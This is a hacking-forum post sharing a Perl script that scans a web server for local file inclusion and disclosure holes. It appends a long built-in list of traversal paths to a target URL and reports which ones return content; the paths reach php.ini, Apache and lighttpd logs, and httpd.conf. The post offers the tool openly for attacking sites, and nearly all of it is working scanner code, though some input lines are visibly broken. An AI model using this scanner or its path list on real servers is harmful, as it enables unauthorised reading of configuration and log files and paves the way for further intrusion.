Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy

Locked LFD/LFI Paths Checker

sQuo

By ADMINsQuo
in Perl

 Share

Recommended Posts

sQuo Hacker

ADMINsQuo

Posted
Posted

LFD/LFI Paths Checker

 

[LENGUAJE=perl]#!/usr/bin/perl

# m-a_labz

use HTTP::Request;

use LWP::Simple;

use Term::ANSIColor;

use Win32::Console::ANSI;

$|=1;

print color("bold black"), "\n\t[+] LFD/LFI Paths Checker\n";

a:

print color("bold red"), "\n[+] Enter Url : ";

print color 'reset';

$ex=;

chomp($ex);

if ($ex =~ /exit/ ||$ex =~ /quit/) {

exit;

}

# keyword if false

print color("bold red"), "[+] Enter KeyWord : ";

print color 'reset';

$keyword=;

chomp($keyword);

print color("bold red"), "[+] Enter Paths File : ";

print color 'reset';

$pathsf=;

chomp($pathsf);

print color("bold red"), "[+] Should I Save Results ? : ";

print color 'reset';

$save=;

chomp($save);

if ($ex =~ /http/){

$exp = $ex;

}else{

$exp = "http://".$ex;

}

if ($pathsf =~ /.txt/) {

open (tt, "

my @tt = ;

close tt;

}

elsif ($pathsf =~ /inside/)

{

@tt = (

'/usr/local/apache/logs/audit_log',

'/logs/security_debug_log',

'/logs/security_log',

'/var/log/lighttpd.error.log',

'/var/log/lighttpd.access.log',

'/var/lighttpd.log',

'/var/logs/access.log',

'/var/log/lighttpd/',

'/var/log/lighttpd/error.log',

'/var/log/lighttpd/access.http://www.log',

'/var/log/lighttpd/error.http://www.log',

'/var/log/lighttpd/access.log',

'/usr/local/apache2/logs/lighttpd.error.log',

'/usr/local/apache2/logs/lighttpd.log',

'/usr/local/apache/logs/lighttpd.error.log',

'/usr/local/apache/logs/lighttpd.log',

'/var/log/lighttpd.access.log',

'/var/log/lighttpd.error.log',

'/usr/local/lighttpd/log/lighttpd.error.log',

'/usr/local/lighttpd/log/access.log',

'../../../../../../../../../etc/php.ini',

'../../../../../../../../../bin/php.ini',

'../../../../../../../../../etc/httpd/php.ini',

'../../../../../../../../../usr/lib/php.ini',

'../../../../../../../../../usr/lib/php/php.ini',

'../../../../../../../../../usr/local/etc/php.ini',

'../../../../../../../../../usr/local/lib/php.ini',

'../../../../../../../../../usr/local/php/lib/php.ini',

'../../../../../../../../../usr/local/php4/lib/php.ini',

'../../../../../../../../../usr/local/php5/lib/php.ini',

'../../../../../../../../../usr/local/apache/conf/php.ini',

'../../../../../../../../../etc/php4.4/fcgi/php.ini',

'../../../../../../../../../etc/php4/apache/php.ini',

'../../../../../../../../../etc/php4/apache2/php.ini',

'../../../../../../../../../etc/php5/apache/php.ini',

'../../../../../../../../../etc/php5/apache2/php.ini',

'../../../../../../../../../etc/php/php.ini',

'../../../../../../../../../etc/php/php4/php.ini',

'../../../../../../../../../etc/php/apache/php.ini',

'../../../../../../../../../etc/php/apache2/php.ini',

'../../../../../../../../../web/conf/php.ini',

'../../../../../../../../../usr/local/Zend/etc/php.ini',

'../../../../../../../../../opt/xampp/etc/php.ini',

'../../../../../../../../../var/local/www/conf/php.ini',

'../../../../../../../../../etc/php/cgi/php.ini',

'../../../../../../../../../etc/php4/cgi/php.ini',

'../../../../../../../../../etc/php5/cgi/php.ini',

'../../../../../../../../../php5\php.ini',

'../../../../../../../../../php4\php.ini',

'../../../../../../../../../php\php.ini',

'../../../../../../../../../PHP\php.ini',

'../../../../../../../../../WINDOWS\php.ini',

'../../../../../../../../../WINNT\php.ini',

'../../../../../../../../../apache\php\php.ini',

'../../../../../../../../../xampp\apache\bin\php.ini',

'../../../../../../../../../NetServer\bin\stable\apache\php.ini',

'../../../../../../../../../home2\bin\stable\apache\php.ini',

'../../../../../../../../../home\bin\stable\apache\php.ini',

'../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',

'../../../../../../../../../../../../var/log/httpd/access_log',

'../../../../../../../../../../../../var/log/httpd/error_log',

'../../../../../../../../../../var/log/httpd/access_log',

'../../../../../../../../../../var/log/httpd/error_log',

'../apache/logs/error.log',

'../apache/logs/access.log',

'../../apache/logs/error.log',

'../../apache/logs/access.log',

'../../../apache/logs/error.log',

'../../../apache/logs/access.log',

'../../../../apache/logs/error.log',

'../../../../apache/logs/access.log',

'../../../../../apache/logs/error.log',

'../../../../../apache/logs/access.log',

'../apache2/logs/error.log',

'../apache2/logs/access.log',

'../../apache2/logs/error.log',

'../../apache2/logs/access.log',

'../../../apache2/logs/error.log',

'../../../apache2/logs/access.log',

'../../../../apache2/logs/error.log',

'../../../../apache2/logs/access.log',

'../../../../../apache2/logs/error.log',

'../../../../../apache2/logs/access.log',

'../logs/error.log',

'../logs/access.log',

'../../logs/error.log',

'../../logs/access.log',

'../../../logs/error.log',

'../../../logs/access.log',

'../../../../logs/error.log',

'../../../../logs/access.log',

'../../../../../logs/error.log',

'../../../../../logs/access.log',

'../../../../../../../../../../etc/httpd/logs/acces_log',

'../../../../../../../../../../etc/httpd/logs/acces.log',

'../../../../../../../../../../etc/httpd/logs/error_log',

'../../../../../../../../../../etc/httpd/logs/error.log',

'../../../../../../../../../../usr/local/apache/logs/access_log',

'../../../../../../../../../../usr/local/apache/logs/access.log',

'../../../../../../../../../../usr/local/apache/logs/error_log',

'../../../../../../../../../../usr/local/apache/logs/error.log',

'../../../../../../../../../../usr/local/apache2/logs/access_log',

'../../../../../../../../../../usr/local/apache2/logs/access.log',

'../../../../../../../../../../usr/local/apache2/logs/error_log',

'../../../../../../../../../../usr/local/apache2/logs/error.log',

'../../../../../../../../../../var/www/logs/access_log',

'../../../../../../../../../../var/www/logs/access.log',

'../../../../../../../../../../var/www/logs/error_log',

'../../../../../../../../../../var/www/logs/error.log',

'../../../../../../../../../../var/log/httpd/access_log',

'../../../../../../../../../../var/log/httpd/access.log',

'../../../../../../../../../../var/log/httpd/error_log',

'../../../../../../../../../../var/log/httpd/error.log',

'../../../../../../../../../../var/log/apache/access_log',

'../../../../../../../../../../var/log/apache/access.log',

'../../../../../../../../../../var/log/apache/error_log',

'../../../../../../../../../../var/log/apache/error.log',

'../../../../../../../../../../var/log/apache2/access_log',

'../../../../../../../../../../var/log/apache2/access.log',

'../../../../../../../../../../var/log/apache2/error_log',

'../../../../../../../../../../var/log/apache2/error.log',

'../../../../../../../../../../var/log/access_log',

'../../../../../../../../../../var/log/access.log',

'../../../../../../../../../../var/log/error_log',

'../../../../../../../../../../var/log/error.log',

'../../../../../../../../../../opt/lampp/logs/access_log',

'../../../../../../../../../../opt/lampp/logs/error_log',

'../../../../../../../../../../opt/xampp/logs/access_log',

'../../../../../../../../../../opt/xampp/logs/error_log',

'../../../../../../../../../../opt/lampp/logs/access.log',

'../../../../../../../../../../opt/lampp/logs/error.log',

'../../../../../../../../../../opt/xampp/logs/access.log',

'../../../../../../../../../../opt/xampp/logs/error.log',

'../../../apache/logs/error.log',

'../../../apache/logs/access.log',

'../../../../apache/logs/error.log',

'../../../../apache/logs/access.log',

'../../../../../apache/logs/error.log',

'../../../../../apache/logs/access.log',

'../../../../../../apache/logs/error.log',

'../../../../../../apache/logs/access.log',

'../../../../../../../apache/logs/error.log',

'../../../../../../../apache/logs/access.log',

'../../../../../../../../apache/logs/error.log',

'../../../../../../../../apache/logs/access.log',

'../../../logs/error.log',

'../../../logs/access.log',

'../../../../logs/error.log',

'../../../../logs/access.log',

'../../../../../logs/error.log',

'../../../../../logs/access.log',

'../../../../../../logs/error.log',

'../../../../../../logs/access.log',

'../../../../../../../logs/error.log',

'../../../../../../../logs/access.log',

'../../../../../../../../logs/error.log',

'../../../../../../../../logs/access.log',

'../../../../../../../../../../../../etc/httpd/logs/acces_log',

'../../../../../../../../../../../../etc/httpd/logs/acces.log',

'../../../../../../../../../../../../etc/httpd/logs/error_log',

'../../../../../../../../../../../../etc/httpd/logs/error.log',

'../../../../../../../../../../../../var/www/logs/access_log',

'../../../../../../../../../../../../var/www/logs/access.log',

'../../../../../../../../../../../../usr/local/apache/logs/access_log',

'../../../../../../../../../../../../usr/local/apache/logs/access.log',

'../../../../../../../../../../../../var/log/apache/access_log',

'../../../../../../../../../../../../var/log/apache/access.log',

'../../../../../../../../../../../../var/log/access_log',

'../../../../../../../../../../../../var/www/logs/error_log',

'../../../../../../../../../../../../var/www/logs/error.log',

'../../../../../../../../../../../../usr/local/apache/logs/error_log',

'../../../../../../../../../../../../usr/local/apache/logs/error.log',

'../../../../../../../../../../../../var/log/apache/error_log',

'../../../../../../../../../../../../var/log/apache/error.log',

'../../../../../../../../../../../../var/log/access_log',

'../../../../../../../../../../../../var/log/error_log',

'../../../../../../usr/local/apache/conf/httpd.conf',

'../../../../../../usr/local/apache2/conf/httpd.conf',

'../../../../../../etc/httpd/conf/httpd.conf',

'../../../../../../etc/apache/conf/httpd.conf',

'../../../../../../usr/local/etc/apache/conf/httpd.conf',

'../../../../../../etc/apache2/httpd.conf',

'../../../../../../../../../usr/local/apache/conf/httpd.conf',

'../../../../../../../../../usr/local/apache2/conf/httpd.conf',

'../../../../../../../../usr/local/apache/httpd.conf',

'../../../../../../../../usr/local/apache2/httpd.conf',

'../../../../../../../../usr/local/httpd/conf/httpd.conf',

'../../../../../../../usr/local/etc/apache/conf/httpd.conf',

'../../../../../../../usr/local/etc/apache2/conf/httpd.conf',

'../../../../../../../usr/local/etc/httpd/conf/httpd.conf',

'../../../../../../../usr/apache2/conf/httpd.conf',

'../../../../../../../usr/apache/conf/httpd.conf',

'../../../../../../../usr/local/apps/apache2/conf/httpd.conf',

'../../../../../../../usr/local/apps/apache/conf/httpd.conf',

'../../../../../../etc/apache/conf/httpd.conf',

'../../../../../../etc/apache2/conf/httpd.conf',

'../../../../../../etc/httpd/conf/httpd.conf',

'../../../../../../../../../etc/php5/apache2/httpd/conf/httpd.conf',

'../../../../../../etc/http/conf/httpd.conf',

'../../../../../../etc/apache2/httpd.conf',

'../../../../../../etc/httpd/httpd.conf',

'../../../../../../etc/http/httpd.conf',

'../../../../../../etc/httpd.conf',

'../../../../../opt/apache/conf/httpd.conf',

'../../../../../opt/apache2/conf/httpd.conf',

'../../../../../../../../../etc/php5/apache2/conf/httpd.conf',

'../../../../var/www/conf/httpd.conf',

'../../../private/etc/httpd/httpd.conf',

'../../../private/etc/httpd/httpd.conf.default',

'../../Volumes/webBackup/opt/apache2/conf/httpd.conf',

'../../Volumes/webBackup/private/etc/httpd/httpd.conf',

'../../Volumes/webBackup/private/etc/httpd/httpd.conf.default',

'../../../../../../../../../usr/local/php/httpd.conf.php',

'../../../../../../../../../usr/local/php4/httpd.conf.php',

'../../../../../../../../../usr/local/php5/httpd.conf.php',

'../../../../../../../../../usr/local/php/httpd.conf',

'../../../../../../../../../usr/local/php4/httpd.conf',

'../../../../../../../../../usr/local/php5/httpd.conf',

'../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',

'../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',

'../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',

'../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',

'../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',

'../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',

'/usr/local/etc/apache/vhosts.conf'

);

}else{

print color("bold blue"), "\n\tZuHaHaHaHaHa My Master Is BAKA :P\n";

print color 'reset';

}

foreach $path (@tt)

{

chomp $path;

$url = $exp.$path ;

$request = HTTP::Request->new(GET=>$url);

$useragent = LWP::UserAgent->new();

$useragent->timeout(5);

$response = $useragent->request($request);

if ($response->content=~m/$keyword/g)

{

if ($ARGV[0] =~ "-v" ){

} else {

print color("bold white"), "[.] $path ";

print "Not Found\n";

}

} else {

print color("bold red"), "[+] FOUND => ";

print color("bold yellow"), "$path\n";

print color 'reset';

if ($save =~ /.txt/)

{

open(a, ">>$save");

print a "$path\n";

close(a);

}

}

next;

}

 

print color 'reset';

print "\n\t\t[+] Enter 1 To Go Back To Menu : ";my $back=;

chomp $back;

if ($back eq "1")

{

system("cls");

require("../main.pl");

}

goto a;[/LENGUAJE]

Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.